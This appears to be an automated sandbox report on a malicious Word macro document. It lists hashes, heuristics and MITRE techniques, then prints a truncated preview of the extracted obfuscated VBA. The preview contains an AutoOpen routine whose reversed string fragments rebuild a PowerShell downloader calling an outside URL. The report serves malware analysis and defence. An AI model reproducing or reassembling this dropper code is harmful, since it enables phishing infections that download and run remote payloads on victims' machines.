Office (OLE) malware analysis — malicious · 35de4cf3ed429504

MALICIOUS

Office (OLE)

99.5 KB Created: 2018-02-07 17:32:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 0c2de7cca796f760be377d701485e5c1 SHA-1: 59a4dcd2dc8317e21e6e4a5bae5bf392656b0025 SHA-256: 35de4cf3ed429504e8b8695b33f386d2ca84017373af99b76f41d5df69f5f84c

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call, indicating an intent to execute arbitrary code. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports its malicious nature as a dropper or lure. The VBA code appears to be obfuscated, but the presence of the Shell() call and the AutoOpen execution token strongly suggests it's designed to download and execute a secondary payload.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23605 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	23605 bytes
SHA-256: `6be795f77d660fd42a2710ec2ec59a915af1e1d4d73df196e475110624afbaaf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "MNSLzDj" Sub AutoOpen() On Error Resume Next awSRWWnGK = raSWnhhMaUq - cSUUDzQFdXYqdf / (1331063 + YsTwGizpCc - 4647184 + iMolJbUzzBT) qpFCUCbtI = JoiBtstUfSa - nWQimhBKHa / (4387316 + dHBjdmajPD - 4774817 + GkPjbiSisR) CilmPurwT = RJXlqNrssrJj - sbBSSjcIofLFTu / (8280718 + jsRkpGzMds - 2660850 + aqBHSksKObYOq) Application.Run "OqIsDVZfw", IrzXKGF addMjWSAV = zszImioo - VpiziEmjBj / (1718008 + TCtOcTA - 9447452 + vmFiBPScGj) ZnwtBsfwH = nQUMHfpGtJKnrD - CdTdoTHvzjQ / (4063473 + rWzVtCii - 3513038 + WWZMizWlwvTwP) End Sub Function IrzXKGF() On Error Resume Next sZXwf = JwVWuPqSTS - jojbRDpHBGiVb / (4028017 + jMTZdinlFz - 1456428 + mAQQKrZ) ZawKpSzX = cjlapCC - SbatBWidwtoL / (8709811 + idKDDGl - 8116872 + iCQvwbtjbc) GhpIDSkhOU = SdWNwPR - SRCNLZFHQmzv / (176323 + DwrlbmCFKNj - 8593558 + AGwEnpwXGboE) pPZKSoaW = JQlRTMstsJo + Mid(StrReverse("MvRqaLLYEmWSTFjmVuqzlB)zl1zl1NiOj-'+']52'+',51,'+'4[cEpSMEHT+EHTOc:VNEFtv (. EHT((( )EHTEHTNIoj-]52,42,4[cepSMOc:VNEGJK (&'(( (xei JFhE"), 5, 109) dNATpSAAP = NofkNGpiSp - ATiLGCD / (9567412 + CjGuibNlCs - 8673832 + fZqzKOKzmKm) zuSFAt = nTJOQbzncGT - ikCltDbZwiUu / (8466529 + vntwhsua - 1441092 + SzVbvGwZF) FmUNcvbn = RZLZFiiM - JwOWEfJtdYbl / (1417351 + nSuiAiqfvoh - 8977960 + cTszJirwQD) KdcIci = rTdwbhzrZa + Mid(StrReverse("aLtVNo'+'+zl1+zl1lh5odnalEHT+E'+'HTh5+lh5rzl1+zl1 )GKlh5+lh5P'+'tEHT+EHTlh5+lh5GKlh5+lh5P+GKPcejbo-wlh5+lh5GKlEHZzUMGE"), 7, 106) krzzPbYJ = LzihsdCa - JJhZkZSDPiXOR / (3419876 + siLvKJk - 4846264 + NhzaAzV) dEQWulnGLAX = doHmDmjaL - uSArthioOR / (1388299 + iYkcMDarC - 3206649 + JlcKRpsb) ZtzHSsTff = zoqHEVnRvL - DGOKiCaZjATS / (5699311 + qGRXNzWq - 7359327 + pidYrPIvq) ZfQJfPn = RwlMUAiYKwX + Mid(StrReverse("wzvKulh5+EHT+EHTlh5szl1+zl1 + GKPk9lh5'+'+lhzlEHT+EHT1+zl15zl1+zl1VGKlh5'+'+l'+'h5Plh5zl1+zl1+l'+'h5 + cilh5+lh5lbup:vnezl1+zl1lh5+lzl1+zl1h529slh5+lh5 EHT+EHT= CDS29lh5+lh'+'5PWVQdoWpW"), 10, 171) ARsrmjNiWWN = MwOOVuiMON - zVAZCiQsXb / (9591705 + njzwwlD - 8902920 + kSViKctON) CcsdJBkN = RsjZwbpLkfc - vOvafWzk / (5078733 + SCNCiusF - 4239507 + KwjJEKCVJZT) PzXbObOGsV = pcWHjjzXQ - EGajMuwuTiJ / (9622518 + zhlWVTcaArEMkj - 4465106 + IIwNhraj) EdRRLrZwa = GDXRbOOSvUf + Mid(StrReverse("FcM5Nlh5+lh529s;tnlh5+lh5eilCbelh5+lh5W.lh5+lh5tzl1+zl1lh5+lh5eN.mlh5zl1+zl1+lh5etsyzl1+zl1lh5+lh5zl1+zl1S )GKlh5+lh5Ptlzl1+zl1h5+lh5clh5+l'+'h5elh5+EHT+EHTlh5jbo-GKP+GKlh5+lh5Plh5+lh5wGKHiEYWXmOPs"), 11, 184) LzTFRRiB = zMbDnCEOVT - OZiKVLkPIHC / (9879867 + KELtCzVEJw - 2696088 + juafnMNDVuwjvT) lYkzpZ = HPOSvNEtjqKMWw - FbUOoQKkUu / (7787986 + BQFfwiFNpufSic - 275548 + odArEwpWLhfcz) YBPhawjGjt = tXGRDcdLMdQ - iKvBfMPTvruw / (8337537 + biUQDdQ - 2006092 + IMRYYNd) wXBwnmq = wIYPGpErfW + Mid(StrReverse("KdnElllPjHORRU+]3,1[)(GNIrtzl1+zl1sOT.ECNerQuJBDUbn"), 9, 29) GbwWV = iiBcJZABu - vZnUXJnpOnqFS / (5145935 + VYmwHLPkPm - 5301526 + jCrXXTmVwowsVo) YtHZUSZZ = mfWYQbEoBO - mffoXiw / (2114552 + mWPSmfEc - 6416442 + tbTrcFtNKX) ZizJwzvAAD = OpISjHqHRQw - jjQPDmlW / (5405622 + cViToCji - 3940905 + nfYhGAFXOUQJ) MWXdmho = WbTQibJBS + Mid(StrReverse("qUAALTKS/zl1+zl1:pttlh5+lzl1+zl1h5hzl1+zl1?/lh5+lh56K53/moc.'+'4lh5+lh52ezig//lh5+lh5:ptthlhEHT+E'+'HT5+lh5 '+'zl1+zl1 lh5+lh5Glh5+lh5KPlh5+lh5 lh5+lh5= Xlh5+lhzl1+zl15CDA29slh5+lh5;lh5+lh5)3lh5+lh531282 zRR"), 3, 197) HvNzljjA = TnYnvLWBI - IDjNHHqTZNjd / (8088914 + osLmfQUTMsEaw - 5592759 + kukCiilvM) BQqYQuFEjni = sRtNajqzfwCAk - sOoqnIjLNF / (7799587 + waMKDzwsn - 9735298 + FlMOdQiKkJO) SXpIvwTwv = PtuHDMhE - ZHkPlVuFBritn / (6782834 + buDuiuE - 1791439 + QwRIqvjGuljd) CwUbzEiR = QmKMqpbZBzINno + Mid(StrReverse("bzMijJzwlh5EHT+EHT+lh5)lh5+lh5GKlh5+lh5'+'Plh5+lh5mEHT+EHTlh5+lh5etI-eGlh5+lh5KPE'+'HT+EHT+GKPkGKP+lh5+lh5GKlh5EHT+EHT+lh5Polh5+lh5vnlh5+lh5IGKP(&;)lh5+lh5CcqWMfOMdDzsJPv"), 15, 148) ... (truncated)

SHA-256: 6be795f77d660fd42a2710ec2ec59a915af1e1d4d73df196e475110624afbaaf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MNSLzDj"
Sub AutoOpen()
On Error Resume Next
awSRWWnGK = raSWnhhMaUq - cSUUDzQFdXYqdf / (1331063 + YsTwGizpCc - 4647184 + iMolJbUzzBT)
qpFCUCbtI = JoiBtstUfSa - nWQimhBKHa / (4387316 + dHBjdmajPD - 4774817 + GkPjbiSisR)
CilmPurwT = RJXlqNrssrJj - sbBSSjcIofLFTu / (8280718 + jsRkpGzMds - 2660850 + aqBHSksKObYOq)
Application.Run "OqIsDVZfw", IrzXKGF
addMjWSAV = zszImioo - VpiziEmjBj / (1718008 + TCtOcTA - 9447452 + vmFiBPScGj)
ZnwtBsfwH = nQUMHfpGtJKnrD - CdTdoTHvzjQ / (4063473 + rWzVtCii - 3513038 + WWZMizWlwvTwP)
End Sub
Function IrzXKGF()
On Error Resume Next
sZXwf = JwVWuPqSTS - jojbRDpHBGiVb / (4028017 + jMTZdinlFz - 1456428 + mAQQKrZ)
ZawKpSzX = cjlapCC - SbatBWidwtoL / (8709811 + idKDDGl - 8116872 + iCQvwbtjbc)
GhpIDSkhOU = SdWNwPR - SRCNLZFHQmzv / (176323 + DwrlbmCFKNj - 8593558 + AGwEnpwXGboE)
pPZKSoaW = JQlRTMstsJo + Mid(StrReverse("MvRqaLLYEmWSTFjmVuqzlB)zl1zl1NiOj-'+']52'+',51,'+'4[cEpSMEHT+EHTOc:VNEFtv (. EHT((( )EHTEHTNIoj-]52,42,4[cepSMOc:VNEGJK (&'(( (xei JFhE"), 5, 109)
dNATpSAAP = NofkNGpiSp - ATiLGCD / (9567412 + CjGuibNlCs - 8673832 + fZqzKOKzmKm)
zuSFAt = nTJOQbzncGT - ikCltDbZwiUu / (8466529 + vntwhsua - 1441092 + SzVbvGwZF)
FmUNcvbn = RZLZFiiM - JwOWEfJtdYbl / (1417351 + nSuiAiqfvoh - 8977960 + cTszJirwQD)
KdcIci = rTdwbhzrZa + Mid(StrReverse("aLtVNo'+'+zl1+zl1lh5odnalEHT+E'+'HTh5+lh5rzl1+zl1 )GKlh5+lh5P'+'tEHT+EHTlh5+lh5GKlh5+lh5P+GKPcejbo-wlh5+lh5GKlEHZzUMGE"), 7, 106)
krzzPbYJ = LzihsdCa - JJhZkZSDPiXOR / (3419876 + siLvKJk - 4846264 + NhzaAzV)
dEQWulnGLAX = doHmDmjaL - uSArthioOR / (1388299 + iYkcMDarC - 3206649 + JlcKRpsb)
ZtzHSsTff = zoqHEVnRvL - DGOKiCaZjATS / (5699311 + qGRXNzWq - 7359327 + pidYrPIvq)
ZfQJfPn = RwlMUAiYKwX + Mid(StrReverse("wzvKulh5+EHT+EHTlh5szl1+zl1 + GKPk9lh5'+'+lhzlEHT+EHT1+zl15zl1+zl1VGKlh5'+'+l'+'h5Plh5zl1+zl1+l'+'h5 + cilh5+lh5lbup:vnezl1+zl1lh5+lzl1+zl1h529slh5+lh5 EHT+EHT= CDS29lh5+lh'+'5PWVQdoWpW"), 10, 171)
ARsrmjNiWWN = MwOOVuiMON - zVAZCiQsXb / (9591705 + njzwwlD - 8902920 + kSViKctON)
CcsdJBkN = RsjZwbpLkfc - vOvafWzk / (5078733 + SCNCiusF - 4239507 + KwjJEKCVJZT)
PzXbObOGsV = pcWHjjzXQ - EGajMuwuTiJ / (9622518 + zhlWVTcaArEMkj - 4465106 + IIwNhraj)
EdRRLrZwa = GDXRbOOSvUf + Mid(StrReverse("FcM5Nlh5+lh529s;tnlh5+lh5eilCbelh5+lh5W.lh5+lh5tzl1+zl1lh5+lh5eN.mlh5zl1+zl1+lh5etsyzl1+zl1lh5+lh5zl1+zl1S )GKlh5+lh5Ptlzl1+zl1h5+lh5clh5+l'+'h5elh5+EHT+EHTlh5jbo-GKP+GKlh5+lh5Plh5+lh5wGKHiEYWXmOPs"), 11, 184)
LzTFRRiB = zMbDnCEOVT - OZiKVLkPIHC / (9879867 + KELtCzVEJw - 2696088 + juafnMNDVuwjvT)
lYkzpZ = HPOSvNEtjqKMWw - FbUOoQKkUu / (7787986 + BQFfwiFNpufSic - 275548 + odArEwpWLhfcz)
YBPhawjGjt = tXGRDcdLMdQ - iKvBfMPTvruw / (8337537 + biUQDdQ - 2006092 + IMRYYNd)
wXBwnmq = wIYPGpErfW + Mid(StrReverse("KdnElllPjHORRU+]3,1[)(GNIrtzl1+zl1sOT.ECNerQuJBDUbn"), 9, 29)
GbwWV = iiBcJZABu - vZnUXJnpOnqFS / (5145935 + VYmwHLPkPm - 5301526 + jCrXXTmVwowsVo)
YtHZUSZZ = mfWYQbEoBO - mffoXiw / (2114552 + mWPSmfEc - 6416442 + tbTrcFtNKX)
ZizJwzvAAD = OpISjHqHRQw - jjQPDmlW / (5405622 + cViToCji - 3940905 + nfYhGAFXOUQJ)
MWXdmho = WbTQibJBS + Mid(StrReverse("qUAALTKS/zl1+zl1:pttlh5+lzl1+zl1h5hzl1+zl1?/lh5+lh56K53/moc.'+'4lh5+lh52ezig//lh5+lh5:ptthlhEHT+E'+'HT5+lh5 '+'zl1+zl1 lh5+lh5Glh5+lh5KPlh5+lh5 lh5+lh5= Xlh5+lhzl1+zl15CDA29slh5+lh5;lh5+lh5)3lh5+lh531282 zRR"), 3, 197)
HvNzljjA = TnYnvLWBI - IDjNHHqTZNjd / (8088914 + osLmfQUTMsEaw - 5592759 + kukCiilvM)
BQqYQuFEjni = sRtNajqzfwCAk - sOoqnIjLNF / (7799587 + waMKDzwsn - 9735298 + FlMOdQiKkJO)
SXpIvwTwv = PtuHDMhE - ZHkPlVuFBritn / (6782834 + buDuiuE - 1791439 + QwRIqvjGuljd)
CwUbzEiR = QmKMqpbZBzINno + Mid(StrReverse("bzMijJzwlh5EHT+EHT+lh5)lh5+lh5GKlh5+lh5'+'Plh5+lh5mEHT+EHTlh5+lh5etI-eGlh5+lh5KPE'+'HT+EHT+GKPkGKP+lh5+lh5GKlh5EHT+EHT+lh5Polh5+lh5vnlh5+lh5IGKP(&;)lh5+lh5CcqWMfOMdDzsJPv"), 15, 148)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.